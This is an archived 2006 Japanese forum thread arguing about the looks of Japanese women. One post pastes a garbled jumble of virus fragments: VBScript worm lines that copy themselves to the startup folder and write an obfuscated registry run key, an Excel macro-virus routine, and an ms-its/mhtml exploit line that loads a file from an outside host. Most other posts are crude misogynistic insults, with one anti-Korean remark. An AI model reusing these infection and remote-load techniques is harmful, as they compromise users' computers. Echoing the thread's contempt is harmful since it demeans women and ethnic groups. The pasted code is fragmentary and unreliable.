136 :Ms.名無しさん:2006/11/11(土) 00:48:07
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT! http://www.loadcash.biz//adverts//35//main.chm::/main.htm";;; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

137 :Ms.名無しさん:2006/11/11(土) 03:01:00
>>133 適当に遊ばれてるだけだろww 自身があるって、単なる思い込みじゃないことを祈るぜw

138 :Ms.名無しさん:2006/11/11(土) 03:12:58
つか釣りスレだろ?

開いた時点で不細工って言葉に反応した敗者
書き込んだ時点で(内容による)図星

粘着したら……

139 :パク・ポンジュン:2006/11/11(土) 12:36:04
>>135
そんな日本男に追われもされない不細工日本女のほうが哀れw
外人女を追いかけてる日本男はいずれ彼女をゲットするわけだが、
追っかけもしてもらえないブスチンな日本女って、これからどーすんのw

140 :Ms.名無しさん:2006/11/11(土) 12:39:43
>>136このやろうウイルス貼ってんじゃねーぞカス!!

141 :Ms.名無しさん:2006/11/12(日) 05:03:31
女にとっては図星スレ

142 :Ms.名無しさん:2006/11/12(日) 08:53:01
自信家の男性が白人女性と結婚して、日本で子孫繁栄してくれれば日本人もマシになるんじゃない?
外国行って嫁をもらってこいよ!

143 :Ms.名無しさん:2006/11/13(月) 13:06:17
なるほど!

144 :パク・ポンジュン:2006/11/15(水) 22:12:27
ほらほら、落ちてるぞ

145 :Ms.名無しさん:2006/11/16(木) 00:00:25
確かに外国と比べたら劣るかもしれないけど、わたしの周りにはかわいい女の子いっぱいいるのに男でかっこいいひとなんていないなぁ。女は化粧できるから変わるけど素の男はやっぱり不細工でしかない。

146 :Ms.名無しさん:2006/11/16(木) 03:29:52
男女お互い様だろ

147 :Ms.名無しさん:2006/11/17(金) 04:45:22
>>145
海外でも芸能人で人気あるのは日本の男
アジアじゃ欧米の俳優やなんかよりも人気あるしな
欧州でもビジュアル系など人気出てきてる

148 :Ms.名無しさん:2006/11/18(土) 02:28:36
そこらへんは微妙な腺だがな

149 :Ms.名無しさん:2006/11/18(土) 02:32:59
韓国人の日本分断スレだろ ココ

150 :Ms.名無しさん:2006/11/18(土) 16:14:46
男もブサイクだからそりゃしょうがないでしょ。。

151 :Ms.名無しさん:2006/11/19(日) 09:27:07
http://www.geocities.co.jp/WallStreet-Bull/5799/sabetuithiran0.html
男性差別がひどいから無くすためにみんな協力してくれ、男性論女性論板で議論しよう 、ここまで男性がゴミみたいに扱われ黙ってられるか!許さん許さん許さん許さん許さん許さん許さん

152 :パク・ポンジュン:2006/11/20(月) 12:32:51
うりゃ!

153 :Ms.名無しさん:2006/11/21(火) 12:11:25
なぜ日本女は不細工なのか?
答え:体型を決める遺伝子に異常があるから



154 :Ms.名無しさん:2006/11/22(水) 21:57:04
なるほど!

155 :Ms.名無しさん:2006/11/23(木) 03:00:57
このスレってなかなか女からの書き込みがないな
スレ名自体、鋭く事実を突いてるわけで
女ども、現実逃避かな?

156 :Ms.名無しさん:2006/12/26(火) 05:24:46
>>155
正解

157 :Ms.名無しさん:2006/12/26(火) 13:29:33
ロシア女と並ばせると可哀相だよなw

37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)